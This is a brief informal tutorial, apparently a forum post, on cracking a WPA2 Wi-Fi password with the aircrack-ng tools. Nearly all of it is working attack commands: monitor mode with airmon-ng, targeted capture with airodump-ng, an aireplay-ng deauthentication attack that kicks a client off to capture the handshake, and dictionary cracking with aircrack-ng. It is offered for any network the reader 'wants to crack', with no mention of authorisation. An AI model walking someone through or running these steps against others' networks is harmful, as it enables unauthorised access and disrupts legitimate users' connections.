Hello guys, this is a quick how to crack a wireless network.
1) airmon-ng ( Show interfaces)
2) airmon-ng start wlan0 ( Put in monitoring mode and allow it do do channel hopping)
3) airodump-ng mon0 (This will start a channel hopping and look for all access points)
5) Now choose the one that you want to crack from the list with the command
airodump-ng -c 10 --bssid 00:00:00:00:00:00 mon0 -w /root/wpa2crack
And now it is capturing everything only for that specific channel and wireless device.
6) Now you need to capture the handshake, you have to options, wait for the client reconnect or disconnect the client with a deauth attack and force the client to reconnect, to do that type:
7) aireplay-ng -0 1 -a ( access point) 00:00:00:00:00:00 -c (client that I want to launch my attack agaist) 00:00:00:00:00 mon0
8) If you look at the top right corner, you will see WPA HANDSHAKE , then crtl+c
9) You crack it with : aircrack-ng /root/wpa2crack.cap -w /pentest/passwords/wordlist/dict.txt
10 ) You should see your key, you can also use rainbow tables with john the ripper.